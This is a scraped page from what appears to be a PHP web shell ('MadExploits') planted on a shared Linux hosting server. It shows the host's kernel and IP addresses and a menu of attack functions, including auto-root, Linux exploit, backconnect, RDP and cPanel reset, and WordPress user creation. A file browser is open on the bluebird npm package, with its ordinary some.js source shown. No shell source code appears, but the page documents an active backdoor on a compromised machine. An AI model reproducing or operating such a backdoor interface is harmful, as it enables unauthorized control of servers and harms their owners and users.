Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.144.222.72
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
node_modules /
npm /
node_modules /
bluebird /
js /
release /
[ HOME SHELL ]
Name
Size
Permission
Action
any.js
421
B
-rw-r--r--
assert.js
1.61
KB
-rw-r--r--
async.js
4.05
KB
-rw-r--r--
bind.js
1.92
KB
-rw-r--r--
bluebird.js
291
B
-rw-r--r--
call_get.js
4.25
KB
-rw-r--r--
cancel.js
3.62
KB
-rw-r--r--
catch_filter.js
1.39
KB
-rw-r--r--
context.js
2.33
KB
-rw-r--r--
debuggability.js
29.63
KB
-rw-r--r--
direct_resolve.js
1.36
KB
-rw-r--r--
each.js
789
B
-rw-r--r--
errors.js
3.63
KB
-rw-r--r--
es5.js
1.93
KB
-rw-r--r--
filter.js
314
B
-rw-r--r--
finally.js
4.5
KB
-rw-r--r--
generators.js
7.58
KB
-rw-r--r--
join.js
8.03
KB
-rw-r--r--
map.js
5.25
KB
-rw-r--r--
method.js
1.73
KB
-rw-r--r--
nodeback.js
1.52
KB
-rw-r--r--
nodeify.js
1.61
KB
-rw-r--r--
promise.js
25.59
KB
-rw-r--r--
promise_array.js
5.08
KB
-rw-r--r--
promisify.js
11.9
KB
-rw-r--r--
props.js
3.04
KB
-rw-r--r--
queue.js
1.83
KB
-rw-r--r--
race.js
1.22
KB
-rw-r--r--
reduce.js
5.01
KB
-rw-r--r--
schedule.js
2.1
KB
-rw-r--r--
settle.js
1.23
KB
-rw-r--r--
some.js
3.87
KB
-rw-r--r--
synchronous_inspection.js
2.75
KB
-rw-r--r--
thenables.js
2.08
KB
-rw-r--r--
timers.js
2.34
KB
-rw-r--r--
using.js
7.35
KB
-rw-r--r--
util.js
10.28
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : some.js
"use strict"; module.exports = function(Promise, PromiseArray, apiRejection) { var util = require("./util"); var RangeError = require("./errors").RangeError; var AggregateError = require("./errors").AggregateError; var isArray = util.isArray; var CANCELLATION = {}; function SomePromiseArray(values) { this.constructor$(values); this._howMany = 0; this._unwrap = false; this._initialized = false; } util.inherits(SomePromiseArray, PromiseArray); SomePromiseArray.prototype._init = function () { if (!this._initialized) { return; } if (this._howMany === 0) { this._resolve([]); return; } this._init$(undefined, -5); var isArrayResolved = isArray(this._values); if (!this._isResolved() && isArrayResolved && this._howMany > this._canPossiblyFulfill()) { this._reject(this._getRangeError(this.length())); } }; SomePromiseArray.prototype.init = function () { this._initialized = true; this._init(); }; SomePromiseArray.prototype.setUnwrap = function () { this._unwrap = true; }; SomePromiseArray.prototype.howMany = function () { return this._howMany; }; SomePromiseArray.prototype.setHowMany = function (count) { this._howMany = count; }; SomePromiseArray.prototype._promiseFulfilled = function (value) { this._addFulfilled(value); if (this._fulfilled() === this.howMany()) { this._values.length = this.howMany(); if (this.howMany() === 1 && this._unwrap) { this._resolve(this._values[0]); } else { this._resolve(this._values); } return true; } return false; }; SomePromiseArray.prototype._promiseRejected = function (reason) { this._addRejected(reason); return this._checkOutcome(); }; SomePromiseArray.prototype._promiseCancelled = function () { if (this._values instanceof Promise || this._values == null) { return this._cancel(); } this._addRejected(CANCELLATION); return this._checkOutcome(); }; SomePromiseArray.prototype._checkOutcome = function() { if (this.howMany() > this._canPossiblyFulfill()) { var e = new AggregateError(); for (var i = this.length(); i < this._values.length; ++i) { if (this._values[i] !== CANCELLATION) { e.push(this._values[i]); } } if (e.length > 0) { this._reject(e); } else { this._cancel(); } return true; } return false; }; SomePromiseArray.prototype._fulfilled = function () { return this._totalResolved; }; SomePromiseArray.prototype._rejected = function () { return this._values.length - this.length(); }; SomePromiseArray.prototype._addRejected = function (reason) { this._values.push(reason); }; SomePromiseArray.prototype._addFulfilled = function (value) { this._values[this._totalResolved++] = value; }; SomePromiseArray.prototype._canPossiblyFulfill = function () { return this.length() - this._rejected(); }; SomePromiseArray.prototype._getRangeError = function (count) { var message = "Input array must contain at least " + this._howMany + " items but contains only " + count + " items"; return new RangeError(message); }; SomePromiseArray.prototype._resolveEmptyArray = function () { this._reject(this._getRangeError(0)); }; function some(promises, howMany) { if ((howMany | 0) !== howMany || howMany < 0) { return apiRejection("expecting a positive integer\u000a\u000a See http://goo.gl/MqrFmX\u000a"); } var ret = new SomePromiseArray(promises); var promise = ret.promise(); ret.setHowMany(howMany); ret.init(); return promise; } Promise.some = function (promises, howMany) { return some(promises, howMany); }; Promise.prototype.some = function (howMany) { return some(this, howMany); }; Promise._SomePromiseArray = SomePromiseArray; };
Close